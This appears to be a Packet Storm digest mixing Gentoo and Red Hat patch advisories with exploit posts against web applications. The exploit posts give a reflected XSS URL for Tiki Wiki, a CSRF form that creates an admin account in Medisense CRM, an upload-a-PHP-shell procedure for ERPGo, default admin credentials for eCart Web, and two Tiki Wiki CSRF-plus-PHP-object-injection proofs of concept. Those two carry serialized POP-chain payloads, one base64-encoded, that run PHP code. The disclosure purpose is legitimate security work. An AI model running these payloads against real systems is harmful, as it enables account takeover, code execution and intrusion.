Gentoo Linux Security Advisory 202301-4 - A vulnerability has been discovered in jupyter_core which could allow for the execution of code as another user. Versions less than 4.11.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: jupyter_core: Arbitrary Code Execution  
     Date: January 11, 2023  
     Bugs: #878497  
       ID: 202301-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in jupyter_core which could allow  
for the execution of code as another user.

Background  
==========

jupyter_core contains core Jupyter functionality.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-python/jupyter_core    < 4.11.2                    >= 4.11.2

Description  
===========

jupyter_core trusts files for execution in the current working directory  
without validating ownership of those files.

Impact  
======

By writing to a directory that is used a the current working directory  
for jupyter_core by another user, users can elevate privileges to those  
of another user.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All jupyter_core users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/jupyter_core-4.11.2"

References  
==========

[ 1 ] CVE-2022-39286  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39286

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-04

Gentoo Linux Security Advisory 202301-3 - A vulnerability was found in scikit-learn which could result in denial of service. Versions less than 1.1.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: scikit-learn: Denial of Service  
     Date: January 11, 2023  
     Bugs: #758323  
       ID: 202301-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability was found in scikit-learn which could result in denial  
of service.

Background  
==========

scikit-learn is a machine learning library for Python.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  sci-libs/scikit-learn      < 1.1.1                      >= 1.1.1

Description  
===========

When supplied with a crafted model SVM, predict() can result in a null  
pointer dereference.

Impact  
======

An attcker capable of providing a crafted model to scikit-learn can  
result in denial of service.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All scikit-learn users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sci-libs/scikit-learn-1.1.1"

References  
==========

[ 1 ] CVE-2020-28975  
      https://nvd.nist.gov/vuln/detail/CVE-2020-28975

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-03

Tiki Wiki CMS Groupware version 25.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : tiki.org                                                                   ││  Vendor   : Tiki Software Community Association                                        ││  Software : Tiki Wiki CMS Groupware 25.0                                               ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'objectId' is vulnerable to XSSPath: /25x/tiki-ajax_services.phphttps://demo.tiki.org/25x/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=%ec%98%a4%eb%8a%98%ec%9d%98%20%eb%82%a0%ec%94%a8%7d%7dfz6no%3cscript%3ealert(1)%3c%2fscript%3ewwyvb[-] Done

Tiki Wiki CMS Groupware 25.0 Cross Site Scripting

Medisense-Healthcare Solutions CRM version 2.0 suffers from a cross site request forgery vulnerability.

    ====================================================================================================================================| # Title     : Medisense-Healthcare Solutions CRM v2.0 CSRF Vulnerability                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://medisensecrm.com                                                                                           |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] infected file : /Add-User1.php .[+] save code as poc.html .<h2>Add New User</h2>    <form name="frmCreateuser" method="POST" action="https://127.0.0.1/medisensecrmcom/Add-User1.php" onsubmit="return createUser()">    <h3>User Name :<input type="text" name="txtuser" class="txtfield fr"/></h3>    <h3>Password :<input type="password" name="txtNewPass" class="txtfield fr"/></h3>    <h3>Re-type Password :<input type="password" name="txtVerifyPass" class="txtfield fr"/></h3>    <h3>USer Type:<label class="fr" ><input type="radio" name="usertype" class="rdBtn fr" value="1" checked/>Executive</label><br><label class="fr">    <input type="radio" name="usertype" value="0" class="rdBtn fr"/>Admin</label></h3>    <input type="submit" name="cmdSubmit" value="SUBMIT" class="submitBtn" />  </div>  </form>    </div></div>Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Medisense-Healthcare Solutions CRM 2.0 Cross Site Request Forgery

Red Hat Security Advisory 2023-0059-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include an out of bounds write vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:0059-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0059  
Issue date:        2023-01-10  
CVE Names:         CVE-2022-2639   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.1 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
kpatch-patch-4_18_0-147_70_1-1-2.el8_1.src.rpm  
kpatch-patch-4_18_0-147_74_1-1-2.el8_1.src.rpm  
kpatch-patch-4_18_0-147_76_1-1-1.el8_1.src.rpm  
kpatch-patch-4_18_0-147_77_1-1-1.el8_1.src.rpm

ppc64le:  
kpatch-patch-4_18_0-147_70_1-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_70_1-debuginfo-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_70_1-debugsource-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_74_1-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_74_1-debuginfo-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_74_1-debugsource-1-2.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_76_1-1-1.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_76_1-debuginfo-1-1.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_76_1-debugsource-1-1.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_77_1-1-1.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_77_1-debuginfo-1-1.el8_1.ppc64le.rpm  
kpatch-patch-4_18_0-147_77_1-debugsource-1-1.el8_1.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-147_70_1-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_70_1-debuginfo-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_70_1-debugsource-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_74_1-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_74_1-debuginfo-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_74_1-debugsource-1-2.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_76_1-1-1.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_76_1-debuginfo-1-1.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_76_1-debugsource-1-1.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_77_1-1-1.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_77_1-debuginfo-1-1.el8_1.x86_64.rpm  
kpatch-patch-4_18_0-147_77_1-debugsource-1-1.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY73n79zjgjWX9erEAQgKiQ/+LjewZ+MyCvWJ+qhyPc14GCy51ttayGca  
fO4urBYkA+HH8jal6201GurCnpquoQsD7CtLW4A3LUeNezKHRVW0v4B7LqqBjTuK  
aOXFHApMMF4Hrw1baJnRZq9hF2HLsFA1435v34de6GvNpfvvEBzkrKhrNu45MRf1  
Al1I6094u9AIwM/Q67bubgCz51kIXNZX7F4fFygHBMFkW2czAdCTccftW5/+Fw60  
13iu/LNsY8UnBKxKYrHkcSBenPEklUFyh1l5FR8oZ3+ao/0oNlC4hoM4zmpY8foi  
pBUEtmjGbTLhuMha+1iF3vhTrXK7x6gXWV7JOaZzSM1SvQOjTtAVIcOw94co0pTM  
47tfm5uID2bqG9/a0m3sGUkzFd/zh+4sbyKi4un6D5qxVIZ3ZCa0wNGA0PkAiuGb  
DusgVo1ws5e7mEjpa/Ec2IE4WswT5+HJwACrizbrSsk/q0DhKLQibdgjkS4Xtoe7  
tLdxTYT67dTSnbPjH8WihyNnwuBJTjVOATFeWrjoD7dERXHGxE7wI+mwdzadgz3i  
BibnUT03fXgc0nPoyNmJ20neGKjKkWyx7P0fK1DHbfreOe9sIizqwVzthVIphZcJ  
dgkr/6ML9/NI7GvPXbgwBa9mMEzge7CnwQoXOCmztOLqcFpxuwKHfX5nsJLTMCE1  
VQfi2bo2zrA=  
=qZYv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0059-01

Gentoo Linux Security Advisory 202301-2 - Multiple vulnerabilities have been discovered in Twisted, the worst of which could result in denial of service. Versions less than 22.10.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Twisted: Multiple Vulnerabilities  
     Date: January 11, 2023  
     Bugs: #878499, #834542, #832875  
       ID: 202301-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Twisted, the worst of  
which could result in denial of service.

Background  
==========

Twisted is an asynchronous networking framework written in Python.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-python/twisted         < 22.10.0                  >= 22.10.0

Description  
===========

Multiple vulnerabilities have been discovered in Twisted. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Twisted users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/twisted-22.10.0"

References  
==========

[ 1 ] CVE-2022-21712  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21712  
[ 2 ] CVE-2022-21716  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21716  
[ 3 ] CVE-2022-39348  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39348

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-02

ERPGo SaaS CRM version 3.3 suffers from an arbitrary file upload vulnerability.

    ====================================================================================================================================| # Title     : ERPGo SaaS CRM v3.3 Arbitrary File Upload Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://codecanyon.net/item/erpgo-saas-all-in-one-business-erp-with-project-account-hrm-crm-pos/33263426           |  | # Dork      : "ERPGo SaaS" login                                                                                                 |                "All In One Business ERP With Project, Account, HRM, CRM"                                                          |“Attention is the new currency”  The more effortless the writing looks, the more effort the writer actually put into the process.  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : https://erpgo.127.0.0.1/ERPGo/register <====| Register New account [+] Go to your membership profile and upload a malicious file instead of an image <===| https://erpgo.127.0.0.1/erpgo-saas/profile[+] Your Ev!l = https://erpgo.127.0.0.1/erpgo-saas/storage/uploads/avatar/zip_1671699428.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

ERPGo SaaS CRM 3.3 Arbitrary File Upload

eCart Web version 4.0.0 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : eCart Web v4.0.0- Multi Vendor eCommerce Marketplace Insecure Settings Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://codecanyon.net/item/ecart-web-multi-vendor-ecommerce-marketplace/33201609                                  |  | # Dork      : Copyright © 2022 Made By WRTEAM.                                                                                   |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin  & pass= admin123[+] https://127.0.0.1.com/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

eCart Web 4.0.0 Insecure Settings

Tiki Wiki CMS Groupware versions 24.1 and below suffer from a PHP object injection vulnerability in tikiimporter_blog_wordpress.php.

**Tiki Wiki CMS Groupware 24.1 tikiimporter\_blog\_wordpress.php PHP Object Injection**

    ----------------------------------------------------------------------------------------------------Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP Object Injection Vulnerability----------------------------------------------------------------------------------------------------[-] Software Link:https://tiki.org[-] Affected Versions:Version 24.1 and prior versions.[-] Vulnerability Description:The vulnerability is located in the /lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when importing data from WordPress sites through the Tiki Importer, user input passed through the uploaded XML file is being used in a call to the unserialize() PHP function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires an admin account (specifically, the ‘tiki_p_admin_importer’ permission). However, due to the CSRF vulnerability described in KIS-2023-01, this vulnerability might also be exploited by tricking a victim user into opening a web page like the following:<html>  <form action="http://localhost/tiki/tiki-importer.php" method="POST" enctype="multipart/form-data">   <input type="hidden" name="importerClassName" value="TikiImporter_Blog_Wordpress" />   <input type="hidden" name="importAttachments" value="on" />   <input type="file" name="importFile" id="fileinput"/>  </form>  <script>   const xmlContent = atob("PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAwZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg==");   const fileInput = document.getElementById("fileinput");   const dataTransfer = new DataTransfer();   const file = new File([xmlContent], "test.xml", {type: "text/xml"});   dataTransfer.items.add(file);   fileInput.files = dataTransfer.files;   document.forms[0].submit();  </script></html>[-] Solution:Upgrade to version 24.2 or later.[-] Disclosure Timeline:[07/03/2022] - Vendor notified[23/08/2022] - Version 24.1 released[09/01/2023] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-22851 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-04

Tiki Wiki CMS Groupware 24.1 tikiimporter_blog_wordpress.php PHP Object Injection

Tiki Wiki CMS Groupware versions 24.0 and below suffers from a PHP object injection vulnerability in grid.php.

    -----------------------------------------------------------------------------Tiki Wiki CMS Groupware <= 24.0 (grid.php) PHP Object Injection Vulnerability-----------------------------------------------------------------------------[-] Software Link:https://tiki.org[-] Affected Versions:Version 24.0 and prior versions.[-] Vulnerability Description:The vulnerability is located in the /lib/sheet/grid.php script, specifically into the TikiSheetSerializeHandler::_load() method, which is using the unserialize() PHP function with user-controlled input. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires the “Spreadsheets” feature to be enabled and an account with permissions to create a new sheet. However, due to the CSRF vulnerability described in KIS-2023-01, this vulnerability might also be exploited by tricking a victim user into opening a web page like the following:<html>  <form action="http://localhost/tiki/tiki-import_sheet.php?sheetId=1" method="POST" enctype="multipart/form-data">   <input type="hidden" name="handler" value="TikiSheetSerializeHandler" />   <input type="file" name="file" id="fileinput"/>  </form>  <script>   const popChain = 'O:25:"Search_Elastic_Connection":1:{S:31:"\00Search_Elastic_Connection\00bulk";O:28:"Search_Elastic_BulkOperation":3:{S:35:"\00Search_Elastic_BulkOperation\00count";i:1;S:38:"\00Search_Elastic_BulkOperation\00callback";S:14:"call_user_func";S:36:"\00Search_Elastic_BulkOperation\00buffer";a:2:{i:0;O:22:"Tracker_Field_Computed":3:{S:32:"\00Tracker_Field_Abstract\00itemData";a:1:{S:6:"itemId";i:1;}S:31:"\00Tracker_Field_Abstract\00options";O:15:"Tracker_Options":1:{S:21:"\00Tracker_Options\00data";a:1:{S:7:"formula";S:14:"null;phpinfo()";}}S:41:"\00Tracker_Field_Abstract\00trackerDefinition";O:18:"Tracker_Definition":0:{}}i:1;S:12:"getFieldData";}}}';   const fileInput = document.getElementById("fileinput");   const dataTransfer = new DataTransfer();   const file = new File([popChain], "test");   dataTransfer.items.add(file);   fileInput.files = dataTransfer.files;   document.forms[0].submit();  </script></html>[-] Solution:Upgrade to version 24.1 or later.[-] Disclosure Timeline:[07/03/2022] - Vendor notified[23/08/2022] - Version 24.1 released[09/01/2023] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-22850 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-03

Source

Packet Storm